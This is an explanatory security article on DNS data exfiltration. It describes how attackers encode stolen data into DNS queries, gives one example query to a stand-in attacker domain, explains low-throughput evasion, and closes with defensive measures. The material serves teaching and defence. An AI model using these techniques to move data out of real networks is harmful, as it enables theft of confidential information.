What Is DNS Data Exfiltration?

DNS data exfiltration is a method used by hackers to steal data from an IT system or network by exploiting the Domain Name System (DNS) protocol. In a data exfiltration attack, hackers remove confidential or sensitive data from inside a protected IT environment by embedding it within DNS packets. Since DNS traffic is generally allowed through firewalls and security systems, the malicious data in DNS packets has a high chance of leaving the organization without triggering security alerts. DNS data exfiltration is often one outcome of DNS tunneling attacks. 

DNS is responsible for translating human-readable domain names like website.com into IP addresses such as 2001:db8:3e8:2a3::b63 that are readable by computers. When a user enters a domain name into a web browser, recursive DNS servers or resolvers search for the corresponding IP address by communicating with other nameservers, including root nameservers, top-level domain (TLD) servers, and authoritative nameservers. Alternatively, DNS servers may provide the IP address records from previous DNS responses that have been stored in their cache memory. These communications and DNS requests are commonly allowed through firewalls and are not subject to strict monitoring, making them an ideal attack vector for cybercriminals seeking to smuggle data out of an IT network.

In a DNS data exfiltration attack, a hacker first installs malware on a compromised network or system. This may be accomplished by getting a user inside the network to click on a link or visit a website containing malware that’s then downloaded to their machine. Hackers may also breach a network with stolen credentials and install malware within the environment to take control of the infected device, making it a command and control server.

Attackers then use the DNS protocol to embed data within packets in DNS queries (e.g., encodedstringofdata.attacker.example.com) that resolve to a domain nameserver the attacker owns. The DNS queries containing stolen data pass undiscovered through firewalls and security systems to the attacker’s authoritative nameserver, where the exfiltrated data is decoded and the transfer is complete.

Attackers use several techniques to exfiltrate data via DNS. Attackers may hide sensitive information by encoding it and including it in a subdomain name or resource record data. They may also encapsulate data within DNS packets by splitting information into smaller chunks and sending them over multiple DNS queries and responses. They may embed the data by altering the query ID or modifying DNS packet headers, which the attacker’s server will recognize, and extract or decode the exfiltrated data from the altered DNS traffic.

Low-throughput data exfiltration refers to exfiltration that occurs at a very slow rate to evade detection by network security products. Other forms of DNS attacks like DNS tunneling are often high-throughput incidents, causing a significant change in DNS traffic volumes that can alert security systems to the presence of an attack. In low-throughput data exfiltration, there is no significant spike in traffic volumes since an infected system or endpoint may only send a DNS request once an hour. That makes this particular form of exfiltration over DNS extremely difficult to detect.

IT teams can prevent exfiltration of data by following several cybersecurity best practices.

• Adopt a DNS security solution. DNS security solutions use data exfiltration detection algorithms to continually monitor traffic and analyze DNS traffic logs in search of anomalous patterns or indicators of compromise.
• Ensure firewalls and proxies are correctly configured. Firewalls and proxies should be configured to restrict outbound DNS traffic and prevent unauthorized connections to external DNS servers.
• Enable rate limiting. Limiting the response rate on DNS servers can mitigate the impact of DNS floods and amplification attacks, which hackers often use to distract attention away from their data exfiltration efforts.
• Deploy DNS firewalls. DNS firewall solutions inspect DNS traffic in real time and leverage threat intelligence to block malicious requests and data exfiltration.
• Optimize patching cadences. Keeping DNS servers and software up to date, and regularly applying patches, can remediate vulnerabilities that attackers may exploit as they seek to gain access and exfiltrate data.
• Implement security awareness training. Since human error is one of the most common contributors to successful cyberattacks, security awareness training can help employees avoid the kinds of actions that enable attackers to breach defenses and establish DNS data exfiltration campaigns.